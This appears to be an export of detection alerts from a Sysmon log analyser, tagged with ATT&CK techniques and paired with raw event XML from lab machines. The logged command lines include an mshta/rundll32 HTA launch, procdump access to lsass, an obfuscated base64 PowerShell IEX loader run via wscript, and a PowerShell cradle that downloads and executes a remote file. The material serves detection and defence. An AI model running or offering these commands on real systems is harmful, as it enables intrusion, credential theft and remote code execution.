<Data Name=""LogonId"">0x135f2</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=9018A7D6CDBE859A430E8794E73381F77C840BE0,MD5=60B7C0FEAD45F2066E5B805A91F4F0FC,SHA256=80C10EE5F21F92F89CBC293A59D2FD4C01C7958AACAD15642558DB700943FA22,IMPHASH=F93B5D76132F6E6068946EC238813CE1</Data>
<Data Name=""ParentProcessGuid"">365ABB72-517E-5CD8-0000-001024D61700</Data>
<Data Name=""ParentProcessId"">2952</Data>
<Data Name=""ParentImage"">C:\Windows\System32\pcalua.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\pcalua.exe&quot; -a c:\Windows\system32\calc.exe</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1218.005 ] Mshta found running in the system,1557668281.383045,2019-05-12T17:38:01.383045+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (&quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\programdata\calc.hta&quot;) and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta) in directory : ( c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:38:00.712733Z"">
</TimeCreated>
<EventRecordID>16396</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:38:00.592</Data>
<Data Name=""ProcessGuid"">365ABB72-21B8-5CD8-0000-0010E4E82600</Data>
<Data Name=""ProcessId"">2964</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
<Data Name=""Description"">Microsoft (R) HTML Application host</Data>
<Data Name=""Product"">Internet Explorer</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\programdata\calc.hta&quot; </Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
<Data Name=""ParentProcessGuid"">365ABB72-21B8-5CD8-0000-0010BADE2600</Data>
<Data Name=""ParentProcessId"">3856</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1557668281.383045,2019-05-12T17:38:01.383045+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( &quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\programdata\calc.hta&quot; ) contain suspicious command ( \mshta.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:38:00.712733Z"">
</TimeCreated>
<EventRecordID>16396</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:38:00.592</Data>
<Data Name=""ProcessGuid"">365ABB72-21B8-5CD8-0000-0010E4E82600</Data>
<Data Name=""ProcessId"">2964</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
<Data Name=""Description"">Microsoft (R) HTML Application host</Data>
<Data Name=""Product"">Internet Explorer</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\programdata\calc.hta&quot; </Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
<Data Name=""ParentProcessGuid"">365ABB72-21B8-5CD8-0000-0010BADE2600</Data>
<Data Name=""ParentProcessId"">3856</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1170] Detecting Mshta,1557668281.383045,2019-05-12T17:38:01.383045+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (&quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\programdata\calc.hta&quot;) and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta) in directory : ( c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:38:00.712733Z"">
</TimeCreated>
<EventRecordID>16396</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:38:00.592</Data>
<Data Name=""ProcessGuid"">365ABB72-21B8-5CD8-0000-0010E4E82600</Data>
<Data Name=""ProcessId"">2964</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
<Data Name=""Description"">Microsoft (R) HTML Application host</Data>
<Data Name=""Product"">Internet Explorer</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\programdata\calc.hta&quot; </Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
<Data Name=""ParentProcessGuid"">365ABB72-21B8-5CD8-0000-0010BADE2600</Data>
<Data Name=""ParentProcessId"">3856</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558398907.47416,2019-05-21T04:35:07.474160+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c test.bat ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-21T00:35:07.474160Z"">
</TimeCreated>
<EventRecordID>374</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3416"" ThreadID=""3496"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-21 00:35:07.386</Data>
<Data Name=""ProcessGuid"">365ABB72-47BB-5CE3-0000-001071AD3E00</Data>
<Data Name=""ProcessId"">3944</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\cmd.exe /c test.bat</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-39CC-5CE3-0000-002096C70000</Data>
<Data Name=""LogonId"">0xc796</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-47BB-5CE3-0000-0010BFA83E00</Data>
<Data Name=""ParentProcessId"">1912</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\Downloads\com-hijack.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Users\IEUser\Downloads\com-hijack.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1553028075.154291,2019-03-20T00:41:15.154291+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T20:41:15.144276Z"">
</TimeCreated>
<EventRecordID>1966252</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 20:36:04.226</Data>
<Data Name=""ProcessGuid"">365ABB72-52B4-5C91-0000-0010D55B0100</Data>
<Data Name=""ProcessId"">1636</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-528D-5C91-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-528D-5C91-0000-001062560000</Data>
<Data Name=""ParentProcessId"">484</Data>
<Data Name=""ParentImage"">C:\Windows\System32\services.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\services.exe</Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1003] Credential Dumping - Process Access,1552849783.932612,2019-03-17T23:09:43.932612+04:00,,Threat,High,[T1003] Credential Dumping - Process Access,10,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>10</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>10</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-17T19:09:41.328868Z"">
</TimeCreated>
<EventRecordID>4434</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""344"" ThreadID=""2032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC04.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-17 19:09:41.328</Data>
<Data Name=""SourceProcessGUID"">365ABB72-9B75-5C8E-0000-0010013F1200</Data>
<Data Name=""SourceProcessId"">1856</Data>
<Data Name=""SourceThreadId"">980</Data>
<Data Name=""SourceImage"">C:\Users\IEUser\Desktop\procdump.exe</Data>
<Data Name=""TargetProcessGUID"">365ABB72-0886-5C8F-0000-001030560000</Data>
<Data Name=""TargetProcessId"">476</Data>
<Data Name=""TargetImage"">C:\Windows\system32\lsass.exe</Data>
<Data Name=""GrantedAccess"">0x1fffff</Data>
<Data Name=""CallTrace"">C:\Windows\SYSTEM32\ntdll.dll+4595c|C:\Windows\SYSTEM32\ntdll.dll+1d4da|C:\Windows\system32\kernel32.dll+3cc47|C:\Windows\system32\kernel32.dll+3ff99|C:\Windows\system32\dbghelp.dll+4c791|C:\Windows\system32\dbghelp.dll+4dcab|C:\Windows\system32\dbghelp.dll+4a1b8|C:\Windows\system32\dbghelp.dll+45b81|C:\Windows\system32\dbghelp.dll+45e2a|C:\Users\IEUser\Desktop\procdump.exe+11a8d|C:\Users\IEUser\Desktop\procdump.exe+116a6|C:\Users\IEUser\Desktop\procdump.exe+11610|C:\Users\IEUser\Desktop\procdump.exe+11356|C:\Windows\system32\kernel32.dll+4ef8c|C:\Windows\SYSTEM32\ntdll.dll+6367a|C:\Windows\SYSTEM32\ntdll.dll+6364d</Data>
</EventData>
</Event>",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
[ T1059 ] wscript or cscript runing script,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (&quot;c:\windows\system32\wscript.exe&quot; /E:vbs c:\windows\temp\icon.ico &quot;powershell -exec bypass -c &quot;&quot;IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(&apos;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&apos;)))&quot;&quot;&quot;) and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (&quot;C:\Windows\system32\rundll32.exe&quot; zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-14T12:17:14.893930Z"">
</TimeCreated>
<EventRecordID>10675</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2004"" ThreadID=""4480"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-14 12:17:14.661</Data>
<Data Name=""ProcessGuid"">747F3D96-FBCA-5D53-0000-001036784100</Data>
<Data Name=""ProcessId"">2876</Data>
<Data Name=""Image"">C:\Windows\System32\wscript.exe</Data>
<Data Name=""FileVersion"">5.812.10240.16384</Data>
<Data Name=""Description"">Microsoft ® Windows Based Script Host</Data>
<Data Name=""Product"">Microsoft ® Windows Script Host</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;c:\windows\system32\wscript.exe&quot; /E:vbs c:\windows\temp\icon.ico &quot;powershell -exec bypass -c &quot;&quot;IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(&apos;JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp&apos;)))&quot;&quot;&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-F419-5D53-0000-002026910200</Data>
<Data Name=""LogonId"">0x29126</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C</Data>
<Data Name=""ParentProcessGuid"">747F3D96-FBCA-5D53-0000-0010B8664100</Data>
<Data Name=""ParentProcessId"">2476</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920557.811477,2019-05-27T05:29:17.811477+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool /text:processmodel.username ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:17.811477Z"">
</TimeCreated>
<EventRecordID>5901</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:17.771</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6D-5CEB-0000-00100478FF00</Data>
<Data Name=""ProcessId"">3444</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool /text:processmodel.username</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1558969974.632117,2019-05-27T19:12:54.632117+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:54.544664Z"">
</TimeCreated>
<EventRecordID>6190</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:54.515</Data>
<Data Name=""ProcessGuid"">365ABB72-FE76-5CEB-0000-001077710C00</Data>
<Data Name=""ProcessId"">2840</Data>
<Data Name=""Image"">C:\Windows\System32\wbem\WMIC.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">WMI Commandline Utility</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FE76-5CEB-0000-0010546E0C00</Data>
<Data Name=""ParentProcessId"">2356</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1564436004.104732,2019-07-30T01:33:24.104732+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (|, -c ,.Download,.DownloadFile(,Net.WebClient,powershell,.txt,|, -c ,.Download,.DownloadFile(,Net.WebClient,powershell,.txt) in event with Command Line (powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot;) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot;) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
